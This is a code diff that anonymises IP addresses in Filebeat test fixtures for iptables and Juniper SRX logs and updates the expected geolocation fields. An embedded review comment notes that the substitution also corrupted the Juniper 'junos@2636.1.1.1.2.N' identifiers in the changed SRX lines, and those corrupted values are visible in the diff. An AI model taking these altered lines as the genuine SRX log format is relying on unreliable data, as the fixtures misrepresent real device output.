- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
diff --git a/x-pack/filebeat/module/iptables/log/test/geo.log b/x-pack/filebeat/module/iptables/log/test/geo.log
index 1755a7853c00..49efd47de0c0 100644
--- a/x-pack/filebeat/module/iptables/log/test/geo.log
+++ b/x-pack/filebeat/module/iptables/log/test/geo.log
@@ -1 +1 @@
-Oct 10 07:25:12 Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0
+Oct 10 07:25:12 Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=175.16.199.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0
diff --git a/x-pack/filebeat/module/iptables/log/test/geo.log-expected.json b/x-pack/filebeat/module/iptables/log/test/geo.log-expected.json
index 6066210c9ff0..6228539b93a7 100644
--- a/x-pack/filebeat/module/iptables/log/test/geo.log-expected.json
+++ b/x-pack/filebeat/module/iptables/log/test/geo.log-expected.json
@@ -10,7 +10,7 @@
 "event.dataset": "iptables.log",
 "event.kind": "event",
 "event.module": "iptables",
- "event.original": "Oct 10 07:25:12 Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0 ",
+ "event.original": "Oct 10 07:25:12 Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=175.16.199.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0 ",
 "event.timezone": "-02:00",
 "event.type": [
 "connection",
@@ -39,7 +39,7 @@
 "iptables.ubiquiti.rule_number": "default",
 "iptables.ubiquiti.rule_set": "wan-lan",
 "log.offset": 0,
- "network.community_id": "1:RGJPRWtru8Lg2itNyFREDvoRkNA=",
+ "network.community_id": "1:3Mqu8u+9tDyi16P1h2Wlxw1ll98=",
 "network.transport": "tcp",
 "network.type": "ipv4",
 "observer.egress.zone": "lan",
@@ -47,19 +47,20 @@
 "observer.name": "Hostname",
 "related.ip": [
 "10.4.0.5",
- "158.109.0.1"
+ "175.16.199.1"
 ],
 "rule.id": "default",
 "rule.name": "wan-lan",
 "service.type": "iptables",
- "source.as.number": 13041,
- "source.as.organization.name": "Consorci de Serveis Universitaris de Catalunya",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 40.4172,
- "source.geo.location.lon": -3.684,
- "source.ip": "158.109.0.1",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "source.mac": "90:10:65:29:b6:2a",
 "source.port": 38842,
 "tags": [
diff --git a/x-pack/filebeat/module/juniper/srx/test/atp.log b/x-pack/filebeat/module/juniper/srx/test/atp.log
index 95c8210f038a..cf6d3bb7aa39 100644
--- a/x-pack/filebeat/module/juniper/srx/test/atp.log
+++ b/x-pack/filebeat/module/juniper/srx/test/atp.log 
@@ -1,4 +1,4 @@
 <14>1 2013-12-14T16:06:59.134Z pinarello RT_AAMW - SRX_AAMW_ACTION_LOG [junos@xxx.x.x.x.x.28 http-host="www.mytest.com" file-category="executable" action="BLOCK" verdict-number="8" verdict-source=”cloud/blacklist/whitelist” source-address="10.10.10.1" source-port="57116" destination-address="187.19.188.200" destination-port="80" protocol-id="6" application="UNKNOWN" nested-application="UNKNOWN" policy-name="argon_policy" username="user1" session-id-32="50000002" source-zone-name="untrust" destination-zone-name="trust"]
 <14>1 2016-09-20T10:43:30.330-07:00 host-example RT_AAMW - AAMW_MALWARE_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp="Thu Jun 23 09:55:38 2016" tenant-id="ABC123456" sample-sha256="ABC123" client-ip="192.0.2.0" verdict-number="9" malware-info="Eicar:TestVirus" username="admin" hostname="host.example.com"]
 <11>1 2016-09-20T10:40:30.050-07:00 host-example RT_AAMW - AAMW_HOST_INFECTED_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp="Thu Jun 23 09:55:38 2016" tenant-id="ABC123456" client-ip="192.0.2.0" hostname="host.example.com" status="in_progress" policy-name="default" th="7" state="added" reason="malware" message="malware analysis detected host downloaded a malicious_file with score 9, sha256 ABC123"]
-<165>1 2007-02-15T09:17:15.719Z aamw1 RT_AAMW - AAMW_ACTION_LOG [junos@2636.1.1.1.2.129 hostname="dummy_host" file-category="executable" verdict-number="10" malware-info="Testfile" action="PERMIT" list-hit="N/A" file-hash-lookup="FALSE" source-address="1.1.1.1" source-port="60148" destination-address="10.0.0.1" destination-port="80" protocol-id="6" application="HTTP" nested-application="N/A" policy-name="test-policy" username="N/A" roles="N/A" session-id-32="502156" source-zone-name="Inside" destination-zone-name="Outside" sample-sha256="e038b5168d9209267058112d845341cae83d92b1d1af0a10b66830acb7529494" file-name="dummy_file" url="dummy_url"]
+<165>1 2007-02-15T09:17:15.719Z aamw1 RT_AAMW - AAMW_ACTION_LOG [junos@2636.81.2.69.144.129 hostname="dummy_host" file-category="executable" verdict-number="10" malware-info="Testfile" action="PERMIT" list-hit="N/A" file-hash-lookup="FALSE" source-address="89.160.20.156" source-port="60148" destination-address="10.0.0.1" destination-port="80" protocol-id="6" application="HTTP" nested-application="N/A" policy-name="test-policy" username="N/A" roles="N/A" session-id-32="502156" source-zone-name="Inside" destination-zone-name="Outside" sample-sha256="e038b5168d9209267058112d845341cae83d92b1d1af0a10b66830acb7529494" file-name="dummy_file" url="dummy_url"]
diff --git a/x-pack/filebeat/module/juniper/srx/test/atp.log-expected.json b/x-pack/filebeat/module/juniper/srx/test/atp.log-expected.json
index 5c788135621d..0134b507169e 100644
--- a/x-pack/filebeat/module/juniper/srx/test/atp.log-expected.json
+++ b/x-pack/filebeat/module/juniper/srx/test/atp.log-expected.json
@@ -3,16 +3,6 @@
 "@timestamp": "2013-12-14T14:06:59.134-02:00",
 "client.ip": "10.10.10.1",
 "client.port": 57116,
- "destination.as.number": 28126,
- "destination.as.organization.name": "BRISANET SERVICOS DE TELECOMUNICACOES LTDA",
- "destination.geo.city_name": "Juazeiro do Norte",
- "destination.geo.continent_name": "South America",
- "destination.geo.country_iso_code": "BR",
- "destination.geo.country_name": "Brazil",
- "destination.geo.location.lat": -7.1467,
- "destination.geo.location.lon": -39.247,
- "destination.geo.region_iso_code": "BR-CE",
- "destination.geo.region_name": "Ceara",
 "destination.ip": "187.19.188.200",
 "destination.port": 80,
 "event.action": "malware_detected",
@@ -176,7 +166,7 @@
 },
 {
 "@timestamp": "2007-02-15T07:17:15.719-02:00",
- "client.ip": "1.1.1.1",
+ "client.ip": "89.160.20.156",
 "client.port": 60148,
 "destination.ip": "10.0.0.1",
 "destination.port": 80, 
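Review bot: The structured-data ID on the new `<165>1` line, `[junos@2636.81.2.69.144.129`, no longer looks like the Juniper enterprise OID suffix it replaces (`2636.1.1.1.2.129`); it appears the address-substitution pass matched the `1.1.1.2` run inside the OID and swapped in `81.2.69.144`, which is not an address field at all. The same rewrite recurs on every changed line of the flow.log hunk (`junos@2636.81.2.69.144.N`), whose end lies outside this view. The pipeline evidently does not key on that identifier, since only the `source-address` values changed in the expected output, but the fixtures are now less representative of real SRX output; restoring `2636.1.1.1.2.N` on these lines would keep the anonymisation scoped to actual address fields. Separately, the unchanged first event still carries `destination-address="187.19.188.200"` while its `destination.geo.*` expectations are dropped in atp.log-expected.json; if the intent is to keep fixtures on documentation/test ranges, that address is a candidate for the same treatment.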
@@ -186,7 +176,7 @@
 "event.dataset": "juniper.srx",
 "event.kind": "event",
 "event.module": "juniper",
- "event.original": "hostname=\"dummy_host\" file-category=\"executable\" verdict-number=\"10\" malware-info=\"Testfile\" action=\"PERMIT\" list-hit=\"N/A\" file-hash-lookup=\"FALSE\" source-address=\"1.1.1.1\" source-port=\"60148\" destination-address=\"10.0.0.1\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" policy-name=\"test-policy\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502156\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" sample-sha256=\"e038b5168d9209267058112d845341cae83d92b1d1af0a10b66830acb7529494\" file-name=\"dummy_file\" url=\"dummy_url\"",
+ "event.original": "hostname=\"dummy_host\" file-category=\"executable\" verdict-number=\"10\" malware-info=\"Testfile\" action=\"PERMIT\" list-hit=\"N/A\" file-hash-lookup=\"FALSE\" source-address=\"89.160.20.156\" source-port=\"60148\" destination-address=\"10.0.0.1\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" policy-name=\"test-policy\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502156\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" sample-sha256=\"e038b5168d9209267058112d845341cae83d92b1d1af0a10b66830acb7529494\" file-name=\"dummy_file\" url=\"dummy_url\"",
 "event.outcome": "success",
 "event.severity": 165,
 "event.timezone": "-02:00", 
@@ -222,21 +212,24 @@
 "dummy_host"
 ],
 "related.ip": [
- "1.1.1.1",
- "10.0.0.1"
+ "10.0.0.1",
+ "89.160.20.156"
 ],
 "server.ip": "10.0.0.1",
 "server.port": 80,
 "service.type": "juniper",
- "source.as.number": 13335,
- "source.as.organization.name": "Cloudflare, Inc.",
+ "source.as.number": 29518,
+ "source.as.organization.name": "Bredband2 AB",
 "source.domain": "dummy_host",
- "source.geo.continent_name": "Oceania",
- "source.geo.country_iso_code": "AU",
- "source.geo.country_name": "Australia",
- "source.geo.location.lat": -33.494,
- "source.geo.location.lon": 143.2104,
- "source.ip": "1.1.1.1",
+ "source.geo.city_name": "Link\u00f6ping",
+ "source.geo.continent_name": "Europe",
+ "source.geo.country_iso_code": "SE",
+ "source.geo.country_name": "Sweden",
+ "source.geo.location.lat": 58.4167,
+ "source.geo.location.lon": 15.6167,
+ "source.geo.region_iso_code": "SE-E",
+ "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+ "source.ip": "89.160.20.156",
 "source.port": 60148,
 "tags": [
 "forwarded",
diff --git a/x-pack/filebeat/module/juniper/srx/test/flow.log b/x-pack/filebeat/module/juniper/srx/test/flow.log
index 400bceceeeef..89c8b63e546b 100644
--- a/x-pack/filebeat/module/juniper/srx/test/flow.log
+++ b/x-pack/filebeat/module/juniper/srx/test/flow.log 
@@ -1,25 +1,25 @@ -<14>1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.134 source-address="10.0.0.1" source-port="594" destination-address="10.128.0.1" destination-port="10400" connection-tag="0" service-name="icmp" nat-source-address="10.0.0.1" nat-source-port="594" nat-destination-address="10.128.0.1" nat-destination-port="10400" nat-connection-tag="0" src-nat-rule-type="N/A" src-nat-rule-name="N/A" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="1" policy-name="vpn_trust_permit-all" source-zone-name="vpn" destination-zone-name="trust" session-id-32="6093" username="N/A" roles="N/A" packet-incoming-interface="st0.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] -<14>1 2019-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY [junos@2636.1.1.1.2.134 source-address="10.0.0.26" source-port="37233" destination-address="10.128.0.1" destination-port="161" connection-tag="0" service-name="None" protocol-id="17" icmp-type="0" policy-name="MgmtAccess-trust-cleanup" source-zone-name="trust" destination-zone-name="junos-host" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface=".local..0" encrypted="No" reason="Denied by policy" session-id-32="7087" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] -<14>1 2014-05-01T08:26:51.179Z fw01 RT_FLOW - RT_FLOW_SESSION_DENY [junos@2636.1.1.1.2.39 source-address="1.2.3.4" source-port="56639" destination-address="5.6.7.8" destination-port="2003" service-name="None" protocol-id="6" icmp-type="0" policy-name="log-all-else" source-zone-name="campus" destination-zone-name="mngmt" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth6.0" encrypted="No "] -<14>1 
2014-05-01T08:28:10.933Z fw01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.39 reason="unset" source-address="1.2.3.4" source-port="63456" destination-address="5.6.7.8" destination-port="902" service-name="None" nat-source-address="1.2.3.4" nat-source-port="63456" nat-destination-address="5.6.7.8" nat-destination-port="902" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="17" policy-name="mngmt-to-vcenter" source-zone-name="mngmt" destination-zone-name="intra" session-id-32="15353" packets-from-client="1" bytes-from-client="94" packets-from-server="0" bytes-from-server="0" elapsed-time="60" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth3.5" encrypted="No "] -<14>1 2013-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.35 source-address="50.0.0.100" source-port="24065" destination-address="30.0.0.100" destination-port="768" service-name="icmp" nat-source-address="50.0.0.100" nat-source-port="24065" nat-destination-address="30.0.0.100" nat-destination-port="768" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="alg-policy" source-zone-name="untrust" destination-zone-name="trust" session-id-32="100000165" username="N/A" roles="N/A" packet-incoming-interface="reth2.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN"] +<14>1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.81.2.69.144.134 source-address="10.0.0.1" source-port="594" destination-address="10.128.0.1" destination-port="10400" connection-tag="0" service-name="icmp" nat-source-address="10.0.0.1" nat-source-port="594" nat-destination-address="10.128.0.1" nat-destination-port="10400" nat-connection-tag="0" src-nat-rule-type="N/A" src-nat-rule-name="N/A" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="1" policy-name="vpn_trust_permit-all" source-zone-name="vpn" destination-zone-name="trust" 
session-id-32="6093" username="N/A" roles="N/A" packet-incoming-interface="st0.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] +<14>1 2019-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY [junos@2636.81.2.69.144.134 source-address="10.0.0.26" source-port="37233" destination-address="10.128.0.1" destination-port="161" connection-tag="0" service-name="None" protocol-id="17" icmp-type="0" policy-name="MgmtAccess-trust-cleanup" source-zone-name="trust" destination-zone-name="junos-host" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface=".local..0" encrypted="No" reason="Denied by policy" session-id-32="7087" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] +<14>1 2014-05-01T08:26:51.179Z fw01 RT_FLOW - RT_FLOW_SESSION_DENY [junos@2636.81.2.69.144.39 source-address="81.2.69.143" source-port="56639" destination-address="5.6.7.8" destination-port="2003" service-name="None" protocol-id="6" icmp-type="0" policy-name="log-all-else" source-zone-name="campus" destination-zone-name="mngmt" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth6.0" encrypted="No "] +<14>1 2014-05-01T08:28:10.933Z fw01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.81.2.69.144.39 reason="unset" source-address="81.2.69.143" source-port="63456" destination-address="5.6.7.8" destination-port="902" service-name="None" nat-source-address="81.2.69.143" nat-source-port="63456" nat-destination-address="5.6.7.8" nat-destination-port="902" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="17" policy-name="mngmt-to-vcenter" source-zone-name="mngmt" destination-zone-name="intra" session-id-32="15353" packets-from-client="1" bytes-from-client="94" packets-from-server="0" 
bytes-from-server="0" elapsed-time="60" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth3.5" encrypted="No "] +<14>1 2013-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.81.2.69.144.35 source-address="175.16.199.1" source-port="24065" destination-address="30.0.0.100" destination-port="768" service-name="icmp" nat-source-address="175.16.199.1" nat-source-port="24065" nat-destination-address="30.0.0.100" nat-destination-port="768" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="alg-policy" source-zone-name="untrust" destination-zone-name="trust" session-id-32="100000165" username="N/A" roles="N/A" packet-incoming-interface="reth2.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN"] <14>1 2010-09-30T14:55:04.323+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2626.192.0.2.1.40 source-address="192.0.2.1" source-port="1" destination-address="198.51.100.12" destination-port="46384" service-name="icmp" nat-source-address="192.0.2.1" nat-source-port="1" nat-destination-address="18.51.100.12" nat-destination-port="46384" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="policy1" source-zone-name="trustZone" destination-zone-name="untrustZone" session-id-32="41" packet-incoming-interface="ge-0/0/1.0"] <14>1 2010-09-30T14:55:07.188+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2626.192.0.2.1.40 reason="response received" source-address="192.0.2.1" source-port="1" destination-address="198.51.100.12" destination-port="46384" service-name="icmp" nat-source-address="192.0.2.1" nat-source-port="1" nat-destination-address="18.51.100.12" nat-destination-port="46384" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="policy1" source-zone-name="trustZone" destination-zone-name="untrustZone" session-id-32="41" packets-from-client="1" bytes-from-client="84" 
packets-from-server="1" bytes-from-server="84" elapsed-time="0" packet-incoming-interface="ge-0/0/1.0"] -<14>1 2019-04-12T14:29:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason="TCP FIN" source-address="10.3.255.203" source-port="47776" destination-address="8.23.224.110" destination-port="80" connection-tag="0" service-name="junos-http" nat-source-address="10.3.136.49" nat-source-port="19162" nat-destination-address="8.23.224.110" nat-destination-port="80" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="nat1" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit_all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="5" packets-from-client="6" bytes-from-client="337" packets-from-server="4" bytes-from-server="535" elapsed-time="1" application="HTTP" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/0.0" encrypted="No" application-category="Web" application-sub-category="N/A" application-risk="4" application-characteristics="Can Leak Information;Supports File Transfer;Prone to Misuse;Known Vulnerabilities;Carrier of Malware;Capable of Tunneling;"] -<14>1 2019-04-13T14:33:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.58 reason="TCP RST" source-address="192.168.2.164" source-port="53232" destination-address="172.16.1.19" destination-port="445" service-name="junos-smb" nat-source-address="192.168.2.164" nat-source-port="53232" nat-destination-address="172.16.1.19" nat-destination-port="445" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="6" policy-name="35" source-zone-name="Trust" destination-zone-name="Trust" session-id-32="206" packets-from-client="13" bytes-from-client="4274" packets-from-server="9" bytes-from-server="1575" elapsed-time="16" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/2.0"] -<14>1 2018-10-07T01:32:20.898Z 
TestFW2 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.34 reason="idle Timeout" source-address="100.73.10.92" source-port="52890" destination-address="58.68.126.198" destination-port="53" service-name="junos-dns-udp" nat-source-address="58.78.140.131" nat-source-port="11152" nat-destination-address="58.68.126.198" nat-destination-port="53" src-nat-rule-type="source rule" src-nat-rule-name="NAT_S" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="NAT" source-zone-name="Gi_nat" destination-zone-name="Internet" session-id-32="220368889" packets-from-client="1" bytes-from-client="72" packets-from-server="1" bytes-from-server="136" elapsed-time="8" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth0.108" encrypted="UNKNOWN"] -<14>1 2018-06-30T02:17:22.753Z fw0001 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.41 reason="idle Timeout" source-address="192.168.255.2" source-port="62047" destination-address="8.8.8.8" destination-port="53" service-name="junos-dns-udp" nat-source-address="192.168.0.47" nat-source-port="20215" nat-destination-address="8.8.8.8" nat-destination-port="53" src-nat-rule-type="source rule" src-nat-rule-name="rule001" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="trust-to-untrust-001" source-zone-name="trust" destination-zone-name="untrust" session-id-32="9621" packets-from-client="1" bytes-from-client="67" packets-from-server="1" bytes-from-server="116" elapsed-time="3" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="fe-0/0/1.0" encrypted="UNKNOWN"] -<14>1 2015-09-25T14:19:53.846Z VPNBox-A RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.36 reason="application failure or action" source-address="10.164.110.223" source-port="9057" destination-address="10.104.12.161" destination-port="21" service-name="junos-ftp" nat-source-address="10.9.1.150" 
nat-source-port="58020" nat-destination-address="10.12.70.1" nat-destination-port="21" src-nat-rule-name="SNAT-Policy5" dst-nat-rule-name="NAT-Policy10" protocol-id="6" policy-name="FW-FTP" source-zone-name="trust" destination-zone-name="untrust" session-id-32="24311" packets-from-client="0" bytes-from-client="0" packets-from-server="0" bytes-from-server="0" elapsed-time="1" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth0.0" encrypted="No "] -<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CREATE [junos@2636.1.1.1.2.41 source-address="192.168.224.30" source-port="3129" destination-address="207.17.137.56" destination-port="21" service-name="junos-ftp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="173.167.224.7" nat-source-port="14406" nat-destination-address="207.17.137.56" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" username="N/A" roles="N/A" encrypted="N/A"] -<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.41 source-address="192.168.224.30" source-port="3129" destination-address="207.17.137.56" destination-port="21" service-name="junos-ftp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="173.167.224.7" nat-source-port="14406" nat-destination-address="207.17.137.56" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" packets-from-client="1" bytes-from-client="48" packets-from-server="0" bytes-from-server="0" elapsed-time="0" username="N/A" roles="N/A" encrypted="N/A"] -<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.41 reason="application failure or action" 
source-address="192.168.224.30" source-port="3129" destination-address="207.17.137.56" destination-port="21" service-name="junos-ftp" application="FTP" nested-application="UNKNOWN" nat-source-address="173.167.224.7" nat-source-port="14406" nat-destination-address="207.17.137.56" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" packets-from-client="3" bytes-from-client="144" packets-from-server="2" bytes-from-server="104" elapsed-time="1" username="N/A" roles="N/A" encrypted="N/A"] -<14>1 2013-01-19T15:18:18.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.129 source-address="4.0.0.1" source-port="33040" destination-address="5.0.0.1" destination-port="80" service-name="junos-http" application="HTTP" nested-application="FACEBOOK-SOCIALRSS" nat-source-address="4.0.0.1" nat-source-port="33040" nat-destination-address="5.0.0.1" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="28" packets-from-client="371" bytes-from-client="19592" packets-from-server="584" bytes-from-server="686432" elapsed-time="60" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”] -<14>1 2013-01-19T15:18:19.040 SRX100HM RT_FLOW - APPTRACK_SESSION_ROUTE_UPDATE [junos@2636.1.1.1.2.129 source-address="4.0.0.1" source-port="33040" destination-address="5.0.0.1" destination-port="80" service-name="junos-http" application="HTTP" nested-application="FACEBOOK-SOCIALRSS" nat-source-address="4.0.0.1" nat-source-port="33040" nat-destination-address="5.0.0.1" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="28" 
username="user1" roles="DEPT1" encrypted="No" profile-name=”pf1” rule-name=”facebook1” routing-instance=”instance1” destination-interface-name=”st0.0” apbr-rule-type=”default”] -<14>1 2013-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason="TCP CLIENT RST" source-address="4.0.0.1" source-port="48873" destination-address="5.0.0.1" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="4.0.0.1" nat-source-port="48873" nat-destination-address="5.0.0.1" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="32" packets-from-client="5" bytes-from-client="392" packets-from-server="3" bytes-from-server="646" elapsed-time="3" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”] -<14>1 2020-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE_LS [junos@2636.1.1.1.2.35 source-address="50.0.0.100" source-port="24065" destination-address="30.0.0.100" destination-port="768" service-name="icmp" nat-source-address="50.0.0.100" nat-source-port="24065" nat-destination-address="30.0.0.100" nat-destination-port="768" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="alg-policy" source-zone-name="untrust" destination-zone-name="trust" session-id-32="100000165" username="N/A" roles="N/A" packet-incoming-interface="reth2.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN"] -<14>1 2020-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY_LS [junos@2636.1.1.1.2.134 source-address="10.0.0.26" source-port="37233" destination-address="10.128.0.1" destination-port="161" connection-tag="0" service-name="None" protocol-id="17" icmp-type="0" policy-name="MgmtAccess-trust-cleanup" source-zone-name="trust" destination-zone-name="junos-host" 
application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface=".local..0" encrypted="No" reason="Denied by policy" session-id-32="7087" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] -<14>1 2020-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE_LS [junos@2636.1.1.1.2.129 reason="TCP CLIENT RST" source-address="4.0.0.1" source-port="48873" destination-address="5.0.0.1" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="4.0.0.1" nat-source-port="48873" nat-destination-address="5.0.0.1" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="32" packets-from-client="5" bytes-from-client="392" packets-from-server="3" bytes-from-server="646" elapsed-time="3" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”] -<14>1 2020-07-14T14:17:11.928Z SRX100HM RT_FLOW - 